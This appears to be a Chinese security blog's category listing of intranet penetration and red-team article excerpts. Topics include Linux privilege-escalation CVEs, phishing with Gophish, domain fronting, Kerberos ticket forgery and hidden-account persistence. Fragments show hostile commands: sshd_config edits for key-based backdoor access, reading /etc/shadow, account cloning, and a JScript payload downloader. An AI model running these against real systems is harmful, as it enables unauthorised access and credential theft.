内网安全研究
文章平均质量分 67
内网安全研究
god_Zeo
专注网络安全、安全开发、代码审计、红蓝对抗
展开
-
CVE-2021-4034 Linux Polkit pkexec权限提升漏洞
0x01 CVE-2021-4034 漏洞详情Polkit(PolicyKit)是一个用于控制类Unix系统中系统范围权限的组件,它为非特权进程与特权进程的通信提供了一种有组织的方式。pkexec是Polkit开源应用框架的一部分,它负责协商特权进程和非特权进程之间的互动,允许授权用户以另一个用户的身份执行命令,是sudo的替代方案。1月25日,研究人员公开披露了在 polkit 的 pkexec 中发现的一个权限提升漏洞(CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux原创 2022-01-26 16:04:26 · 4913 阅读 · 4 评论 -
钓鱼指北 Gophish钓鱼平台和邮件服务器搭建
0x00 攻防演练钓鱼行动方案起因,在大型攻防演练中,传统的web层面Nday打点突破难点变大,于是越来越多的攻击队会加入钓鱼行动中,本文章就常规邮件的钓鱼进行介绍,后续还有IM这种也是很有效的方式。0x01 搭建Gophish钓鱼平台Gophish 是一个功能强大的开源网络钓框架,安装运行都非常简单。Github 地址:https://github.com/gophish/gophish1、下载https://github.com/gophish/gophish/releases下载对应的版原创 2022-01-20 21:44:10 · 14288 阅读 · 7 评论 -
内网代理流量:Socks5协议原理分析和编程
0x00 前情提要日常渗透演练中,代理是必不可少的,我们用的一般也都是CS自带socks4和代理工具的socks5协议,我们此时还要考虑在这个过程中的流量免杀的问题,所以还是要对底层的协议详细的看一下,然后对流量中的特征分析和修改一下0x01 简介和流程以下摘自维基百科SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。SOCKS是”SOCKetS”的缩写[注 1]。 当防火墙后的客户端要访问外部的服务器时,就跟SOCKS代理服务器连接。这个代理服务器控制客户端访问外网的资原创 2021-10-29 21:42:22 · 3809 阅读 · 0 评论 -
无密码Linux主机利用公钥直接连接
0x00 前提以前的老东西,拿出水一篇一般是通过 Rce,提权等等情况,拿到目标 linux 的 root 权限主要是没有密码, hash 跑不出来,机器无法正常出网就可以去试着正向链接0x01 首先目标主机,修改目标 Ssh 服务配置启用ssh证书登录,并重启SSH 服务echo RSAAuthentication yes >> /etc/ssh/sshd_configecho PubkeyAuthentication yes >> /etc/ssh/sshd_原创 2021-10-13 20:30:28 · 510 阅读 · 0 评论 -
权限维持-影子用户后门
0x00 前提水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面0x01权限维持-影子用户后门影子账户,古老但有效!原理代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号效果net user无法删除,需要删除注册表相关键值;Windows 的登录界面不显示该用户信息。0x02 简单实用ShadowUser.exe admin administrator可以正常登录,桌面什么也是克隆的administrat原创 2021-10-12 21:43:40 · 296 阅读 · 0 评论 -
Linux sudo 提权漏洞 CVE-2021-3156 复现 附exp
0x01 CVE-2021-3156: 缓冲区溢出漏洞在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。0x02 影响版本Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1不受影响版本Sudo =>1.9.5p20x03 漏洞检测测试环境:ubuntu:20.04检测是否存在s原创 2021-02-04 10:51:29 · 1742 阅读 · 0 评论 -
CS通过(CDN+证书)powershell上线详细版
0x00 简介这个应该叫做域前置技术:大致图示:攻击流量通过CDN节点将流量转发到真实的C2服务器CDN节点ip通过识别请求的Host头进行流量转可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上之前看了一些文章,但是大佬有些地方觉得简单肯能就没写,自己搭建的时候就写了一些,算是我的一个笔记吧,感觉较为详细了,比较适合新手。0x01 需要资源cobaltstrike 4.0VPS(cs服务器)域名CDN国外代理0x02 域名免费申请申请地址:ht原创 2020-10-13 18:31:46 · 3719 阅读 · 3 评论 -
内网中CobaltStrike4.0(CS4)的渗透之旅
前言这是老以前做的一个,主要熟悉一下cs4的新特性,还是发出来看看吧,流程简单一些,但是内网流程还是比较完整的。大家可以看看本次靶机为红日安全的ATT&CK第五个靶场。http://vulnstack.qiyuanxuetang.net/vuln/detail/7/思路参考 记一次在Vulnstack ATT&CK 5 靶场中使用CobaltStrike的渗透之旅文章中如有错误的地方望大佬指正。菜鸡文章望大佬勿喷。0x00信息收集Namp 扫一下发现 80 3306原创 2020-07-02 11:57:41 · 4465 阅读 · 0 评论 -
Linux 内网本机信息收集 速查 checklist
Linux 内网本机信息收集速查系统类型cat /etc/issue查看系统名称内核版本uname –a 查看所有信息用户whoamiidcat /etc/passwd #查看用户列表cat /etc/shadow #获取用户hash进程ps aux 查看进程信息网卡/etc/network/interfaces #网卡信息ifconfigroute #查看路由arp -a #查看缓存的地址解析情况服务信息cat /etc/serivice #查看存在的服务原创 2020-06-23 13:52:44 · 869 阅读 · 1 评论 -
内网安全:Kerberoasting攻击和SPN服务
0x01 SPNSPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。SPN是服务器上所运行服务的唯一标识,每个使用Kerberos的服务都需要一个SPNKerberos认证过程使用SPN将服务实例与服务登录账户相关联,如果想使用 Kerberos 协议来认证服务,那么必须正确配置SPN。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPNSPN分为两种,一种注册在AD上机器帐户(Compu原创 2020-05-27 10:39:59 · 1972 阅读 · 0 评论 -
烂土豆Juicypotato提权原理和利用
0x00 Potato(烂土豆)提权的原理:所谓的烂土豆提权就是俗称的MS16-075可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。一、简单的原理:攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机!Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继原创 2020-05-25 15:45:02 · 17480 阅读 · 4 评论 -
土豆提权历史进程
0x01简介在研究提权的时候,发现最近这些东西比较多,而且我自己看起来也是比较混乱,就从网上收集了一些资料,做一个整合和搬运,复现和整理一下,方便你我现在还是有点迷糊,这个估计会再更新,等我再理的清楚一些,然后后面就是单个的文章发布,这个是总的简介0x01 历史进程2016-01-16 初代土豆劫持wpad配合ntlm中继来进行提权Hot Potato – Windows Privilege Escalation2016-09-26 二代土豆劫持系统com服务器地址到恶意服务器上,然后在NT原创 2020-05-25 15:43:01 · 1174 阅读 · 0 评论 -
内网安全:NTML认证流程和PTH原理
NTML认证流程和PTH原理.0x01 本地认证流程0x02 网络认证LM Hash和NTML HashNTLM HashNTLM V2协议0x03 NTLM 认证0x04 Pass The Hash (PTH)原理主要作用:前提:原理:使用方法:绕过补丁,进行哈希传递0x01 本地认证流程操作系统会显示登录界面,接收输入密码后,将密码交给lsass进程,这个进程中会存一份明文密码,将明文密码加密成NTLM Hash,和SAM数据库比较认证。注:winlogon.exe(Windows Log原创 2020-05-14 13:41:28 · 3222 阅读 · 0 评论 -
内网安全:Kerberos域认证流程---黄金票据和白银票据
文章目录0x00 前提0x01 Kerberos域认证域认证大致流程:第一部分:生成TGT 和 session key第二步:获取要访问的 server ticket第三部 向客户端向服务器请求认证0x01 白银票据(Silver Tickets)伪造白银票据(Silver Tickets)0x02 黄金票据(Golden Ticket)伪造黄金票据0x03 黄金票据和白银票据比较0x04 参考0x00 前提算是学习之后总结记录,加深自己的理解,这里我是参考了倾旋师傅的讲解,感觉讲的比较好,加入自己的原创 2020-05-12 14:11:44 · 4351 阅读 · 0 评论 -
内网安全学习从入门到入狱-知识-内网隧道技术小结
0x00 内网穿透技术当我们拿到一台内网主机后,一般都是有区域隔离的。所以内网隧道技术,就是我们必须要掌握的。我简单介绍一下建立通信隧道,常见的有端口转发等主要隧道有:icmp tcp udpSSH HTTP DNS0x01 首先判断出网协议icmp协议:ping 命令ping www.baidu.comTCP协议:curl www.baidu.comnc IPHT...原创 2020-05-06 10:49:39 · 1986 阅读 · 0 评论 -
一句话下载payload(持续更新)
js一句话下载payloadwindows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);Wi...原创 2020-04-24 13:24:07 · 1540 阅读 · 1 评论 -
内网安全学习从入门到入狱-神器-Cobalt Strike-二-Beacon简介和使用
内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用内网安全学习从入门到入狱-神器-Cobalt Strike-二-Beacon简介和使用内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用0x01简单的木马打到一台PC生成win的 Payload0x02 beacon的介绍和使用Beacon简介Beacon分类:http beac...原创 2020-03-15 18:59:19 · 1977 阅读 · 0 评论 -
内网安全学习从入门到入狱-知识-内网信息探测与收集
内网安全学习从入门到入狱-知识-内网信息收集内网信息收集-工作组和域内基本信息收集内网安全学习从入门到入狱-知识-内网信息收集0x01本机检查--先看看我是谁查询并开启远程连接服务0x02域内信息收集查询当前额权限判断是否有域查找域控获取域内的用户信息0x03 域内网存活主机的探测主机存活扫描域内端口扫描PowerSploit 中的 Invoke-Portscan.ps1 脚本前提准备本...原创 2020-03-14 12:22:18 · 996 阅读 · 0 评论 -
内网安全学习从入门到入狱-神器-Cobalt Strike-一-CS的基础和介绍
内网安全学习从入门到入狱-工具-CS基础.md前言本文主要是看了 Cobalt Strike 各种资料后记的笔记。参考过于杂乱,如有问题请联系我手上虽然没有4.0 ,但是也要提前学习了Cobalt Strike简介官网收费软件 https://www.cobaltstrike.com/,Cobalt Strike许可费用为每位用户3500美元,其他的不说了Coba...原创 2020-03-06 10:24:12 · 2452 阅读 · 0 评论 -
内网安全学习从入门到入狱-知识-内网基础知识
内网安全学习从入门到入狱-知识-内网基础知识文章目录内网安全学习从入门到入狱-知识-内网基础知识内网渗透基础基本的名词介绍工作组域活动目录(AD)DC 域控制器(DC)DNS域名服务器安全域的划分DMZ是什么?域中有哪些电脑?域内的权限分类域本地组全局组通用组A-G-DL-P 策略常用本地域组的权限内网渗透基础首先本文章基本上学习笔记基本的名词介绍工作组工作组(Work Gr...原创 2020-03-06 10:19:05 · 4034 阅读 · 4 评论